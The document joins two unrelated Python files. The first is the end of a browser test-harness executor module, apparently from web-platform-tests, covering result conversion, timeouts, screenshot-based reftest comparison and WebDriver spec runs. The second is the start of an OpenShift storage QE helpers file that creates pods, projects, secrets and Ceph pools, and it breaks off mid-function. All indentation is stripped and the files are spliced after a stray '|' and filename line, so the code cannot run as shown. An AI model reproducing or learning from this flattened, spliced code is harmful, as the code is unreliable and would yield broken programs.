executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
# By default the executor may try to cleanup windows after a test (to best
# associate any problems with the test causing them). If the user might
# want to view the results, however, the executor has to skip that cleanup.
if kwargs["pause_after_test"] or kwargs["pause_on_unexpected"]:
executor_kwargs["cleanup_after_test"] = False
executor_kwargs["debug_test"] = kwargs["debug_test"]
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlunsplit(url_parts)
class TestharnessResultConverter(object):
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT",
3: "PRECONDITION_FAILED"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN",
4: "PRECONDITION_FAILED"}
def __call__(self, test, result, extra=None):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message, extra=extra, stack=stack)
return (harness_result,
[test.subtest_result_cls(st_name, self.test_codes[st_status], st_message, st_stack)
for st_name, st_status, st_message, st_stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def hash_screenshots(screenshots):
"""Computes the sha1 checksum of a list of base64-encoded screenshots."""
return [hashlib.sha1(base64.b64decode(screenshot)).hexdigest()
for screenshot in screenshots]
def _ensure_hash_in_reftest_screenshots(extra):
"""Make sure reftest_screenshots have hashes.
Marionette internal reftest runner does not produce hashes.
"""
log_data = extra.get("reftest_screenshots")
if not log_data:
return
for item in log_data:
if type(item) != dict:
# Skip relation strings.
continue
if "hash" not in item:
item["hash"] = hash_screenshots([item["screenshot"]])[0]
def get_pages(ranges_value, total_pages):
"""Get a set of page numbers to include in a print reftest.
:param ranges_value: Parsed page ranges as a list e.g. [[1,2], [4], [6,None]]
:param total_pages: Integer total number of pages in the paginated output.
:retval: Set containing integer page numbers to include in the comparison e.g.
for the example ranges value and 10 total pages this would be
{1,2,4,6,7,8,9,10}"""
if not ranges_value:
return set(range(1, total_pages + 1))
rv = set()
for range_limits in ranges_value:
if len(range_limits) == 1:
range_limits = [range_limits[0], range_limits[0]]
if range_limits[0] is None:
range_limits[0] = 1
if range_limits[1] is None:
range_limits[1] = total_pages
if range_limits[0] > total_pages:
continue
rv |= set(range(range_limits[0], range_limits[1] + 1))
return rv
def reftest_result_converter(self, test, result):
extra = result.get("extra", {})
_ensure_hash_in_reftest_screenshots(extra)
return (test.result_cls(
result["status"],
result["message"],
extra=extra,
stack=result.get("stack")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
def crashtest_result_converter(self, test, result):
return test.result_cls(**result), []
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TimedRunner(object):
def __init__(self, logger, func, protocol, url, timeout, extra_timeout):
self.func = func
self.logger = logger
self.result = None
self.protocol = protocol
self.url = url
self.timeout = timeout
self.extra_timeout = extra_timeout
self.result_flag = threading.Event()
def run(self):
for setup_fn in [self.set_timeout, self.before_run]:
err = setup_fn()
if err:
self.result = (False, err)
return self.result
executor = threading.Thread(target=self.run_func)
executor.start()
# Add twice the extra timeout since the called function is expected to
# wait at least self.timeout + self.extra_timeout and this gives some leeway
timeout = self.timeout + 2 * self.extra_timeout if self.timeout else None
finished = self.result_flag.wait(timeout)
if self.result is None:
if finished:
# flag is True unless we timeout; this *shouldn't* happen, but
# it can if self.run_func fails to set self.result due to raising
self.result = False, ("INTERNAL-ERROR", "%s.run_func didn't set a result" %
self.__class__.__name__)
else:
if self.protocol.is_alive():
message = "Executor hit external timeout (this may indicate a hang)\n"
# get a traceback for the current stack of the executor thread
message += "".join(traceback.format_stack(sys._current_frames()[executor.ident]))
self.result = False, ("EXTERNAL-TIMEOUT", message)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
elif self.result[1] is None:
# We didn't get any data back from the test, so check if the
# browser is still responsive
if self.protocol.is_alive():
self.result = False, ("INTERNAL-ERROR", None)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
return self.result
def set_timeout(self):
raise NotImplementedError
def before_run(self):
pass
def run_func(self):
raise NotImplementedError
class TestExecutor(object):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
__metaclass__ = ABCMeta
test_type = None # type: ClassVar[str]
# convert_result is a class variable set to a callable converter
# (e.g. reftest_result_converter) converting from an instance of
# URLManifestItem (e.g. RefTest) + type-dependent results object +
# type-dependent extra data, returning a tuple of Result and list of
# SubtestResult. For now, any callable is accepted. TODO: Make this type
# stricter when more of the surrounding code is annotated.
convert_result = None # type: ClassVar[Callable[..., Any]]
supports_testdriver = False
supports_jsshell = False
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def __init__(self, logger, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
self.logger = logger
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def reset(self):
"""Re-initialize internal state to facilitate repeated test execution
as implemented by the `--rerun` command-line argument."""
pass
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
try:
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
result = self.do_test(test)
except Exception as e:
exception_string = traceback.format_exc()
self.logger.warning(exception_string)
result = self.result_from_exception(test, e, exception_string)
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol, subdomain=False):
scheme = "https" if protocol == "h2" else protocol
host = self.server_config["browser_host"]
if subdomain:
# The only supported subdomain filename flag is "www".
host = "{subdomain}.{host}".format(subdomain="www", host=host)
return "{scheme}://{host}:{port}".format(scheme=scheme, host=host,
port=self.server_config["ports"][protocol][0])
def test_url(self, test):
return urljoin(self.server_url(test.environment["protocol"],
test.subdomain), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e, exception_string):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "INTERNAL-ERROR"
message = str(getattr(e, "message", ""))
if message:
message += "\n"
message += exception_string
return test.result_cls(status, message), []
def wait(self):
return self.protocol.base.wait()
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
is_print = False
def __init__(self, logger, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, logger, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class CrashtestExecutor(TestExecutor):
convert_result = crashtest_result_converter
class PrintRefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
is_print = True
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi, page_ranges):
key = (test.url, viewport_size, dpi)
if key not in self.screenshot_cache:
success, data = self.get_screenshot_list(test, viewport_size, dpi, page_ranges)
if not success:
return False, data
screenshots = data
hash_values = hash_screenshots(data)
self.screenshot_cache[key] = (hash_values, screenshots)
rv = (hash_values, screenshots)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def reset(self):
self.screenshot_cache.clear()
def check_pass(self, hashes, screenshots, urls, relation, fuzzy):
"""Check if a test passes, and return a tuple of (pass, page_idx),
where page_idx is the zero-based index of the first page on which a
difference occurs if any, or None if there are no differences"""
assert relation in ("==", "!=")
lhs_hashes, rhs_hashes = hashes
lhs_screenshots, rhs_screenshots = screenshots
if len(lhs_hashes) != len(rhs_hashes):
self.logger.info("Got different number of pages")
return relation == "!=", None
assert len(lhs_screenshots) == len(lhs_hashes) == len(rhs_screenshots) == len(rhs_hashes)
for (page_idx, (lhs_hash,
rhs_hash,
lhs_screenshot,
rhs_screenshot)) in enumerate(zip(lhs_hashes,
rhs_hashes,
lhs_screenshots,
rhs_screenshots)):
comparison_screenshots = (lhs_screenshot, rhs_screenshot)
if not fuzzy or fuzzy == ((0, 0), (0, 0)):
equal = lhs_hash == rhs_hash
# sometimes images can have different hashes, but pixels can be identical.
if not equal:
self.logger.info("Image hashes didn't match%s, checking pixel differences" %
("" if len(hashes) == 1 else " on page %i" % (page_idx + 1)))
max_per_channel, pixels_different = self.get_differences(comparison_screenshots,
urls)
equal = pixels_different == 0 and max_per_channel == 0
else:
max_per_channel, pixels_different = self.get_differences(comparison_screenshots,
urls,
page_idx if len(hashes) > 1 else None)
allowed_per_channel, allowed_different = fuzzy
self.logger.info("Allowed %s pixels different, maximum difference per channel %s" %
("-".join(str(item) for item in allowed_different),
"-".join(str(item) for item in allowed_per_channel)))
equal = ((pixels_different == 0 and allowed_different[0] == 0) or
(max_per_channel == 0 and allowed_per_channel[0] == 0) or
(allowed_per_channel[0] <= max_per_channel <= allowed_per_channel[1] and
allowed_different[0] <= pixels_different <= allowed_different[1]))
if not equal:
return (False if relation == "==" else True, page_idx)
# All screenshots were equal within the fuzziness
return (True if relation == "==" else False, None)
def get_differences(self, screenshots, urls, page_idx=None):
from PIL import Image, ImageChops, ImageStat
lhs = Image.open(io.BytesIO(base64.b64decode(screenshots[0]))).convert("RGB")
rhs = Image.open(io.BytesIO(base64.b64decode(screenshots[1]))).convert("RGB")
self.check_if_solid_color(lhs, urls[0])
self.check_if_solid_color(rhs, urls[1])
diff = ImageChops.difference(lhs, rhs)
minimal_diff = diff.crop(diff.getbbox())
mask = minimal_diff.convert("L", dither=None)
stat = ImageStat.Stat(minimal_diff, mask)
per_channel = max(item[1] for item in stat.extrema)
count = stat.count[0]
self.logger.info("Found %s pixels different, maximum difference per channel %s%s" %
(count,
per_channel,
"" if page_idx is None else " on page %i" % (page_idx + 1)))
return per_channel, count
def check_if_solid_color(self, image, url):
extrema = image.getextrema()
if all(min == max for min, max in extrema):
color = ''.join('%02X' % value for value, _ in extrema)
self.message.append("Screenshot is solid color 0x%s for %s\n" % (color, url))
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
page_ranges = test.page_ranges
self.message = []
# Depth-first search of reference tree, with the goal
# of reachings a leaf node with only pass results
stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
page_idx = None
while stack:
hashes = [None, None]
screenshots = [None, None]
urls = [None, None]
nodes, relation = stack.pop()
fuzzy = self.get_fuzzy(test, nodes, relation)
for i, node in enumerate(nodes):
success, data = self.get_hash(node, viewport_size, dpi, page_ranges)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
urls[i] = node.url
is_pass, page_idx = self.check_pass(hashes, screenshots, urls, relation, fuzzy)
if is_pass:
fuzzy = self.get_fuzzy(test, nodes, relation)
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1])
for item in reversed(nodes[1].references)))
else:
# We passed
return {"status": "PASS", "message": None}
# We failed, so construct a failure message
if page_idx is None:
# default to outputting the last page
page_idx = -1
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi, page_ranges)
if success:
screenshots[i] = screenshot
log_data = [
{"url": nodes[0].url,
"screenshot": screenshots[0][page_idx],
"hash": hashes[0][page_idx]},
relation,
{"url": nodes[1].url,
"screenshot": screenshots[1][page_idx],
"hash": hashes[1][page_idx]},
]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def get_fuzzy(self, root_test, test_nodes, relation):
full_key = tuple([item.url for item in test_nodes] + [relation])
ref_only_key = test_nodes[1].url
fuzzy_override = root_test.fuzzy_override
fuzzy = test_nodes[0].fuzzy
sources = [fuzzy_override, fuzzy]
keys = [full_key, ref_only_key, None]
value = None
for source in sources:
for key in keys:
if key in source:
value = source[key]
break
if value:
break
return value
def retake_screenshot(self, node, viewport_size, dpi, page_ranges):
success, data = self.get_screenshot_list(node,
viewport_size,
dpi,
page_ranges)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
def get_screenshot_list(self, node, viewport_size, dpi, page_ranges):
success, data = self.executor.screenshot(node, viewport_size, dpi, page_ranges)
if success and not isinstance(data, list):
return success, [data]
return success, data
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None # type: ClassVar[Type[Protocol]]
def __init__(self, logger, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, environ=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, logger, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.environ = environ if environ is not None else {}
self.output_handler_kwargs = None
self.output_handler_start_kwargs = None
def setup(self, runner):
self.protocol = self.protocol_cls(self, self.browser)
super().setup(runner)
def is_alive(self):
return self.protocol.is_alive()
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + self.extra_timeout
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
return pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
self.result_flag.wait(self.timeout)
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
message = getattr(e, "message")
if message:
message += "\n"
message += traceback.format_exc()
self.result = False, ("INTERNAL-ERROR", message)
finally:
self.result_flag.set()
class ConnectionlessBaseProtocolPart(BaseProtocolPart):
def load(self, url):
pass
def execute_script(self, script, asynchronous=False):
pass
def set_timeout(self, timeout):
pass
def wait(self):
return False
def set_window(self, handle):
pass
def window_handles(self):
return []
class ConnectionlessProtocol(Protocol):
implements = [ConnectionlessBaseProtocolPart]
def connect(self):
pass
def after_connect(self):
pass
class WdspecProtocol(Protocol):
server_cls = None # type: ClassVar[Optional[Type[WebDriverServer]]]
implements = [ConnectionlessBaseProtocolPart]
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
self.environ = os.environ.copy()
self.environ.update(executor.environ)
self.output_handler_kwargs = executor.output_handler_kwargs
self.output_handler_start_kwargs = executor.output_handler_start_kwargs
def connect(self):
"""Connect to browser via the HTTP server."""
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args,
env=self.environ)
self.server.start(block=False,
output_handler_kwargs=self.output_handler_kwargs,
output_handler_start_kwargs=self.output_handler_start_kwargs)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
def after_connect(self):
pass
def teardown(self):
if self.server is not None and self.server.is_alive():
self.server.stop()
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
conn = HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
class CallbackHandler(object):
"""Handle callbacks from testdriver-using tests.
The default implementation here makes sense for things that are roughly like
WebDriver. Things that are more different to WebDriver may need to create a
fully custom implementation."""
unimplemented_exc = (NotImplementedError,) # type: ClassVar[Tuple[Type[Exception], ...]]
def __init__(self, logger, protocol, test_window):
self.protocol = protocol
self.test_window = test_window
self.logger = logger
self.callbacks = {
"action": self.process_action,
"complete": self.process_complete
}
self.actions = {cls.name: cls(self.logger, self.protocol) for cls in actions}
def __call__(self, result):
url, command, payload = result
self.logger.debug("Got async callback: %s" % result[1])
try:
callback = self.callbacks[command]
except KeyError:
raise ValueError("Unknown callback type %r" % result[1])
return callback(url, payload)
def process_complete(self, url, payload):
rv = [strip_server(url)] + payload
return True, rv
def process_action(self, url, payload):
action = payload["action"]
cmd_id = payload["id"]
self.logger.debug("Got action: %s" % action)
try:
action_handler = self.actions[action]
except KeyError:
raise ValueError("Unknown action %s" % action)
try:
with ActionContext(self.logger, self.protocol, payload.get("context")):
result = action_handler(payload)
except self.unimplemented_exc:
self.logger.warning("Action %s not implemented" % action)
self._send_message(cmd_id, "complete", "error", "Action %s not implemented" % action)
except Exception:
self.logger.warning("Action %s failed" % action)
self.logger.warning(traceback.format_exc())
self._send_message(cmd_id, "complete", "error")
raise
else:
self.logger.debug("Action %s completed with result %s" % (action, result))
return_message = {"result": result}
self._send_message(cmd_id, "complete", "success", json.dumps(return_message))
return False, None
def _send_message(self, cmd_id, message_type, status, message=None):
self.protocol.testdriver.send_message(cmd_id, message_type, status, message=message)
class ActionContext(object):
def __init__(self, logger, protocol, context):
self.logger = logger
self.protocol = protocol
self.context = context
self.initial_window = None
def __enter__(self):
if self.context is None:
return
self.initial_window = self.protocol.base.current_window
self.logger.debug("Switching to window %s" % self.context)
self.protocol.testdriver.switch_to_window(self.context, self.initial_window)
def __exit__(self, *args):
if self.context is None:
return
self.logger.debug("Switching back to initial window")
self.protocol.base.set_window(self.initial_window)
self.initial_window = None
|
helpers.py
|
"""
Helper functions file for OCS QE
"""
import base64
import random
import datetime
import hashlib
import json
import logging
import os
import re
import statistics
import tempfile
import threading
import time
import inspect
from concurrent.futures import ThreadPoolExecutor
from itertools import cycle
from subprocess import PIPE, TimeoutExpired, run
from uuid import uuid4
import yaml
from ocs_ci.framework import config
from ocs_ci.helpers.proxy import (
get_cluster_proxies,
update_container_with_proxy_env,
)
from ocs_ci.ocs.utils import mirror_image
from ocs_ci.ocs import constants, defaults, node, ocp
from ocs_ci.ocs.exceptions import (
CommandFailed,
ResourceWrongStatusException,
TimeoutExpiredError,
UnavailableBuildException,
UnexpectedBehaviour,
)
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import pod, pvc
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.utility import templating
from ocs_ci.utility.retry import retry
from ocs_ci.utility.utils import (
TimeoutSampler,
ocsci_log_path,
run_cmd,
update_container_with_mirrored_image,
)
logger = logging.getLogger(__name__)
DATE_TIME_FORMAT = "%Y I%m%d %H:%M:%S.%f"
def create_unique_resource_name(resource_description, resource_type):
"""
Creates a unique object name by using the object_description,
object_type and a random uuid(in hex) as suffix trimmed due to
kubernetes limitation of 63 characters
Args:
resource_description (str): The user provided object description
resource_type (str): The type of object for which the unique name
will be created. For example: project, pvc, etc
Returns:
str: A unique name
"""
name = f"{resource_type}-{resource_description[:23]}-{uuid4().hex}"
return name if len(name) < 40 else name[:40]
def create_resource(do_reload=True, **kwargs):
"""
Create a resource
Args:
do_reload (bool): True for reloading the resource following its creation,
False otherwise
kwargs (dict): Dictionary of the OCS resource
Returns:
OCS: An OCS instance
Raises:
AssertionError: In case of any failure
"""
ocs_obj = OCS(**kwargs)
resource_name = kwargs.get("metadata").get("name")
created_resource = ocs_obj.create(do_reload=do_reload)
assert created_resource, f"Failed to create resource {resource_name}"
return ocs_obj
def wait_for_resource_state(resource, state, timeout=60):
"""
Wait for a resource to get to a given status
Args:
resource (OCS obj): The resource object
state (str): The status to wait for
timeout (int): Time in seconds to wait
Raises:
ResourceWrongStatusException: In case the resource hasn't
reached the desired state
"""
if (
resource.name == constants.DEFAULT_STORAGECLASS_CEPHFS
or resource.name == constants.DEFAULT_STORAGECLASS_RBD
):
logger.info("Attempt to default default Secret or StorageClass")
return
try:
resource.ocp.wait_for_resource(
condition=state, resource_name=resource.name, timeout=timeout
)
except TimeoutExpiredError:
logger.error(f"{resource.kind} {resource.name} failed to reach {state}")
resource.reload()
raise ResourceWrongStatusException(resource.name, resource.describe())
logger.info(f"{resource.kind} {resource.name} reached state {state}")
def create_pod(
interface_type=None,
pvc_name=None,
do_reload=True,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
node_name=None,
pod_dict_path=None,
sa_name=None,
dc_deployment=False,
raw_block_pv=False,
raw_block_device=constants.RAW_BLOCK_DEVICE,
replica_count=1,
pod_name=None,
node_selector=None,
command=None,
command_args=None,
deploy_pod_status=constants.STATUS_COMPLETED,
subpath=None,
):
"""
Create a pod
Args:
interface_type (str): The interface type (CephFS, RBD, etc.)
pvc_name (str): The PVC that should be attached to the newly created pod
do_reload (bool): True for reloading the object after creation, False otherwise
namespace (str): The namespace for the new resource creation
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod
sa_name (str): Serviceaccount name
dc_deployment (bool): True if creating pod as deploymentconfig
raw_block_pv (bool): True for creating raw block pv based pod, False otherwise
raw_block_device (str): raw block device for the pod
replica_count (int): Replica count for deployment config
pod_name (str): Name of the pod to create
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
command (list): The command to be executed on the pod
command_args (list): The arguments to be sent to the command running
on the pod
deploy_pod_status (str): Expected status of deploy pod. Applicable
only if dc_deployment is True
subpath (str): Value of subPath parameter in pod yaml
Returns:
Pod: A Pod instance
Raises:
AssertionError: In case of any failure
"""
if (
interface_type == constants.CEPHBLOCKPOOL
or interface_type == constants.CEPHBLOCKPOOL_THICK
):
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_RBD_POD_YAML
interface = constants.RBD_INTERFACE
else:
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_CEPHFS_POD_YAML
interface = constants.CEPHFS_INTERFACE
if dc_deployment:
pod_dict = pod_dict_path if pod_dict_path else constants.FEDORA_DC_YAML
pod_data = templating.load_yaml(pod_dict)
if not pod_name:
pod_name = create_unique_resource_name(f"test-{interface}", "pod")
pod_data["metadata"]["name"] = pod_name
pod_data["metadata"]["namespace"] = namespace
if dc_deployment:
pod_data["metadata"]["labels"]["app"] = pod_name
pod_data["spec"]["template"]["metadata"]["labels"]["name"] = pod_name
pod_data["spec"]["replicas"] = replica_count
if pvc_name:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["volumes"][0]["persistentVolumeClaim"][
"claimName"
] = pvc_name
else:
pod_data["spec"]["volumes"][0]["persistentVolumeClaim"][
"claimName"
] = pvc_name
if interface_type == constants.CEPHBLOCKPOOL and raw_block_pv:
if pod_dict_path in [constants.FEDORA_DC_YAML, constants.FIO_DC_YAML]:
temp_dict = [
{
"devicePath": raw_block_device,
"name": pod_data.get("spec")
.get("template")
.get("spec")
.get("volumes")[0]
.get("name"),
}
]
if pod_dict_path == constants.FEDORA_DC_YAML:
del pod_data["spec"]["template"]["spec"]["containers"][0][
"volumeMounts"
]
security_context = {"capabilities": {"add": ["SYS_ADMIN"]}}
pod_data["spec"]["template"]["spec"]["containers"][0][
"securityContext"
] = security_context
pod_data["spec"]["template"]["spec"]["containers"][0][
"volumeDevices"
] = temp_dict
elif (
pod_dict_path == constants.NGINX_POD_YAML
or pod_dict == constants.CSI_RBD_POD_YAML
):
temp_dict = [
{
"devicePath": raw_block_device,
"name": pod_data.get("spec")
.get("containers")[0]
.get("volumeMounts")[0]
.get("name"),
}
]
del pod_data["spec"]["containers"][0]["volumeMounts"]
pod_data["spec"]["containers"][0]["volumeDevices"] = temp_dict
else:
pod_data["spec"]["containers"][0]["volumeDevices"][0][
"devicePath"
] = raw_block_device
pod_data["spec"]["containers"][0]["volumeDevices"][0]["name"] = (
pod_data.get("spec").get("volumes")[0].get("name")
)
if command:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["command"] = command
else:
pod_data["spec"]["containers"][0]["command"] = command
if command_args:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["args"] = command_args
else:
pod_data["spec"]["containers"][0]["args"] = command_args
if node_name:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["nodeName"] = node_name
else:
pod_data["spec"]["nodeName"] = node_name
if node_selector:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["nodeSelector"] = node_selector
else:
pod_data["spec"]["nodeSelector"] = node_selector
if sa_name and dc_deployment:
pod_data["spec"]["template"]["spec"]["serviceAccountName"] = sa_name
if subpath:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["volumeMounts"][0][
"subPath"
] = subpath
else:
pod_data["spec"]["containers"][0]["volumeMounts"][0]["subPath"] = subpath
# overwrite used image (required for disconnected installation)
update_container_with_mirrored_image(pod_data)
# configure http[s]_proxy env variable, if required
update_container_with_proxy_env(pod_data)
if dc_deployment:
ocs_obj = create_resource(**pod_data)
logger.info(ocs_obj.name)
assert (ocp.OCP(kind="pod", namespace=namespace)).wait_for_resource(
condition=deploy_pod_status,
resource_name=pod_name + "-1-deploy",
resource_count=0,
timeout=360,
sleep=3,
)
dpod_list = pod.get_all_pods(namespace=namespace)
for dpod in dpod_list:
if "-1-deploy" not in dpod.name:
if pod_name in dpod.name:
return dpod
else:
pod_obj = pod.Pod(**pod_data)
pod_name = pod_data.get("metadata").get("name")
logger.info(f"Creating new Pod {pod_name} for test")
created_resource = pod_obj.create(do_reload=do_reload)
assert created_resource, f"Failed to create Pod {pod_name}"
return pod_obj
def create_project(project_name=None):
"""
Create a project
Args:
project_name (str): The name for the new project
Returns:
ocs_ci.ocs.ocp.OCP: Project object
"""
namespace = project_name or create_unique_resource_name("test", "namespace")
project_obj = ocp.OCP(kind="Project", namespace=namespace)
assert project_obj.new_project(namespace), f"Failed to create namespace {namespace}"
return project_obj
def create_multilpe_projects(number_of_project):
"""
Create one or more projects
Args:
number_of_project (int): Number of projects to be created
Returns:
list: List of project objects
"""
project_objs = [create_project() for _ in range(number_of_project)]
return project_objs
def create_secret(interface_type):
"""
Create a secret
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: An OCS instance for the secret
"""
secret_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
secret_data = templating.load_yaml(constants.CSI_RBD_SECRET_YAML)
secret_data["stringData"]["userID"] = constants.ADMIN_USER
secret_data["stringData"]["userKey"] = get_admin_key()
interface = constants.RBD_INTERFACE
elif interface_type == constants.CEPHFILESYSTEM:
secret_data = templating.load_yaml(constants.CSI_CEPHFS_SECRET_YAML)
del secret_data["stringData"]["userID"]
del secret_data["stringData"]["userKey"]
secret_data["stringData"]["adminID"] = constants.ADMIN_USER
secret_data["stringData"]["adminKey"] = get_admin_key()
interface = constants.CEPHFS_INTERFACE
secret_data["metadata"]["name"] = create_unique_resource_name(
f"test-{interface}", "secret"
)
secret_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
return create_resource(**secret_data)
def default_ceph_block_pool():
"""
Returns default CephBlockPool
Returns:
default CephBlockPool
"""
sc_obj = default_storage_class(constants.CEPHBLOCKPOOL)
cbp_name = sc_obj.get().get("parameters").get("pool")
return cbp_name if cbp_name else constants.DEFAULT_BLOCKPOOL
def create_ceph_block_pool(
pool_name=None, replica=3, compression=None, failure_domain=None, verify=True
):
"""
Create a Ceph block pool
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
failure_domain (str): Failure domain name
verify (bool): True to verify the pool exists after creation,
False otherwise
replica (int): The replica size for a pool
compression (str): Compression type for a pool
Returns:
OCS: An OCS instance for the Ceph block pool
"""
cbp_data = templating.load_yaml(constants.CEPHBLOCKPOOL_YAML)
cbp_data["metadata"]["name"] = (
pool_name if pool_name else create_unique_resource_name("test", "cbp")
)
